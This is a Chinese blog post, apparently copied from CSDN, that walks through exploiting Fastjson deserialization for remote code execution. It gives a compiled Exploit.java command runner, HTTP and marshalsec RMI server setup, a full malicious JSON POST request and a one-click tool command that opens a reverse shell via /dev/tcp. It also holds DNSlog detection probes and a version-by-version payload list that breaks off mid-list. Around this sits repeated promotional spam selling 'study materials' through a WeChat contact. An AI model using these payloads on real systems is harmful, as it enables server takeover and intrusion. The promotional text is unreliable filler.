红队武器库 fastjson小于1,网络安全开发面试题

于 2024-04-21 01:44:34 发布
阅读量358 收藏 6
点赞数 4
分类专栏: 2024年程序员学习 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83739660/article/details/138017338
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

首先编译并上传命令执行代码

使用如下payload:

其中touch /zydx666为系统命令,可以根据自己需求随意修改

注意该文件名叫Exploit.java固定格式不能变

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "touch /zydx666"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

在主机B中使用javac命令编译Exploit.java文件,生成一个Exploit.class文件

javac Exploit.java

然后在主机B启一个http服务,中间件随意,但是需要能访问到Exploit.class文件,这里使用python3临时启动一个

python3 -m http.server --bind 0.0.0.0 8888

0x042 开启远程方法调用rmi服务

接下来在主机C开启rmi服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://1.1.1.1:8888/#Exploit" 9999

marshalsec-0.0.3-SNAPSHOT-all.jar

参考 https://github.com/mbechler/marshalsec

至此服务已经全部就绪

0x043 发送payload

接下来向主机A(存在漏洞机子)发送fastjson反序列化漏洞payload

POST / HTTP/1.1
Host: 1.1.1.1:8090
Accept-Encoding: gzip, deflate
Accept: \*/\*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 260

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://2.2.2.2:9999/Exploit",
        "autoCommit":true
    }
}

此时主机A收到POST请求,触发反序列化漏洞,最终执行Exploit.class 文件中的内容

image-20200703234748062

我使用的是反弹shell命令

反弹shell成功:

image-20200703234115010

0x05简化版攻击工具

下面提供一个简化版工具的工具

是使用https://github.com/wyzxxz/fastjson_rce_tool这位师傅写的,一键起服务和生成恶意代码整个rmi+class文件的jar包

第一步:只需要在自己的服务器上启动

java -cp fastjson_tool.jar fastjson.HRMIServer 1.1.1.1 8888 "bash=bash -i >&/dev/tcp/x.x.x.x/80 0>&1"

第二步:发送payload

成功反弹shell

image-20200703234914580

0x06 漏洞检测

未知目标是否使用 Fastjson ,但站点有原始报错回显

如果站点有原始报错回显,可以用不闭合花括号的方式进行报错回显,报错中往往会有fastjson的字样

例如

image-20200704162617071

无回显,通过DNS回显的方式盲区分 Fastjson 和 Jackson

我使用以下payload测试

{"zeo":{"@type":"java.net.Inet4Address","val":"745shj.dnslog.cn"}}

image-20200704162844047

最终收到dnslog

image-20200704162922529

最新版本1.2.67依然可以通过dnslog判断后端是否使用fastjson

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

畸形的

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

POC:

要嵌套在里面zeo里面

{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}


{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:0

0x07 多版本payload集合

影响版本:

fastjson<=1.2.24

exp:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}

影响版本:

fastjson<=1.2.41

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

影响版本:

fastjson<=1.2.42

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

r)

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
[外链图片转存中…(img-fCMjWfxs-1713635063158)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_83739660
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JAVA获取视频缩略图
02-05
超简单 获取视频缩略图。
8~15k,网络安全面试真题.pdf
02-05
1. 介绍下sql注入 2. 工作中常用的安全设备 3. 有没有用过态势感知? 4. 之前工作经验? 5. 怎么做安全加固? 6. 怎么提权? 7. 渗透流程? 8. 介绍下黄金票据、白银票据? 9. Windows、Linux常用漏洞及编号? 10. ...
Windows系统 cleanmgr命令详解,Windows命令行清理磁盘
热门推荐
wangyuxiang946的博客
11-11 4万+
「作者主页」:士别三日wyx 第一步、打开cmd 按下 win 键,输入 cmd 后回车,打开「命令提示符」 第二步、查看系统版本 在打开的cmd窗口中,输入 cleanmgr 后回车,即可在新弹出的窗口使用磁盘清理功能,选择需要清理的驱动器即可开始清理。 第三步、认识 cleanmgr clean 是清洁的意思 mgr 是经理的意思 cleanmgr 译为清洁经理,用来清除计算机磁盘中不必要的文件。 Windows系统的命令本质上都是「可执行程序」,默认存放在 C:\Windows\.
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 361
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
ES添加用户名和密码
Baronstar的博客
09-01 1万+
数据安全很重要,ES数据上线必须加密码,告诉你怎么加用户和密码
ES设置⽤户名和密码
qq_37190071的博客
04-06 3667
设置完之后,数据会⾃动同步到其他节点。修改密码时,将第⼀步配置删除,然后重启。单独使⽤⼀个节点⽣成证书;执⾏设置⽤户名和密码的命令。执⾏完上⾯命令以后就可以在。⽂件,在⾥⾯添加如下内容。这个⽂件复制到其他节点下。其中⼀个节点设置密码即可。依次对每个账户设置密码。全部节点都要重启⼀遍。需要在配置⽂件中开启。个⽤户分别设置密码,⽬录下,证书⽂件名为。功能,并指定证书位置。
网络安全面试类题目-详解
02-19
【搞定网络协议】之网络安全面试题.pdf 北京某安 安全服务面试经验分享,pdf 常考渗透测试面试题.pdf 吧)护网面试题总结+DD安全工程师笔试问题.pd吧几率大的网络安全面试题(含答案).pdf 面试.pdf 面试经验分享.pdf 某...
2023年HW蓝队面试题
最新发布
04-26
HW分为蓝队和红队红队为常说的攻击队,蓝队为防守队。蓝队一般分为初级监测组,中级研判组,高级应急溯源组; 流程介绍:一般开始前会进行资产梳理,并通过漏洞扫描,渗透测试以及基线检查等做一些自查,一是可以...
网络安全红队工具包总结
05-24
信息收集工具(自动利用工具、资产发现工具、目录扫描工具、子域名收集工具...等)、漏洞利用工具(主要CMS利用工具、中间件)工具等)、内网穿透工具、应急响应工具
美杜莎(Medusa)::cat2:美杜莎(Medusa)是一个红队武器库平台,目前包括扫描功能(200+个突破),XSS平台,协同平台,CVE监控等功能,持续开发中http://medusa.ascotbe.com
02-05
项目开发人员不足。 如果您发现问题或有任何意见,请与我们联系。 bash版本线上Web Beta版已上线| 英文文件 :light_bulb: 文件http://medusa.ascotbe.com :magnifying_glass_tilted_right: 错误覆盖列表...
java利用ffmpeg获取视频缩略图
11-12
这是一个java利用ffmpeg获取视频缩略图的java工程,里面有什么都有了,你只需要导入你的myeclpise,然后运行,看效果就是了,总共就一个类,二十多行代码
ES常见问题(2)-ElasticSearch怎么样设置账号密码
m0_52887673的博客
02-22 9754
ElasticSearch怎么样设置账号密码
【Docker】docker | es | es配置密码 | elasticsearch配置密码
hgSuper的博客
02-20 4141
1、docker部署es2、docker默认无密码,现在需求需要增加安全性,需要增加密码。
电脑C盘满了有什么影响?如何正确清理C盘?
m0_73995538的博客
12-01 5034
电脑的C盘是硬盘的主要分区之一,存有大量系统文件,C盘空间有限,内存剩余过少会影响系统运行。误删除C盘文件可能导致系统崩盘,无法进入系统等问题,那我们如何正确清理C盘文件呢?下面给大家带来三个方法.
kettle解析json数据
lx2wenhui的博客
05-12 4454
使用kettle解析json文件数据
Java SpringBoot 读取、使用yaml文件类型的简述,和对集合list的使用解析
Counter-Strike大牛
08-10 1万+
基本类型的使用 yml文件大部分使用的都是字符串,如果想使用其它类型,只要直接按其它类型写变量值就可以了。 举例: #使用boolean my-switch: is-on: true Java中使用只要加上@Value就可以了: @Value(&quot;${my-switch.is-on}&quot;) private boolean switchOn; 使用其它类型也是一样的。 集...
java yml定义list_Java框架之SpringBoot 09-Web构建-yml-模块-注解
weixin_42320493的博客
02-24 280
SpringBootSpring Boot是一站式整合所有应用框架的框架,简化Spring应用开发,约定大于配置,去繁从简,开箱即用,准生产环境的运行时应用监控框架快速构建 SpringBoot 应用必须联网创建,使用 Eclipse 或 Idea,选择好 SpringBoot 版本及 Spring Starter 模块即可1) 自动生成主程序类,用于启动项目 2)自动生成静态资源目录及属性配置...
ElasticSearch&Kibana设置修改账号密码
普通人一枚
03-15 1320
ElasticSearch&Kibana设置账号密码
红队武器库平台美杜莎安装
09-06
根据引用的信息,美杜莎是一个红队武器库平台,它已获得GPL许可,可以免费用于非商业用途。该项目的开发人员目前比较不足,如果您发现问题或有任何意见,可以与他们联系。根据引用[2]提供的信息,我没有找到关于美杜莎的具体安装步骤或说明。可能需要进一步查找或联系美杜莎项目开发人员获取更多详细信息。<span class="em">1</span><span class="em">2</span> #### 引用[.reference_title] - *1* [美杜莎(Medusa)::cat2:美杜莎(Medusa)是一个红队武器库平台,目前包括扫描功能(200+个突破),XSS...](https://download.csdn.net/download/weixin_42157166/15079253)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [java安卓辅助源码-PentestLog:记下github中的一些项目](https://download.csdn.net/download/weixin_38727199/19392683)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值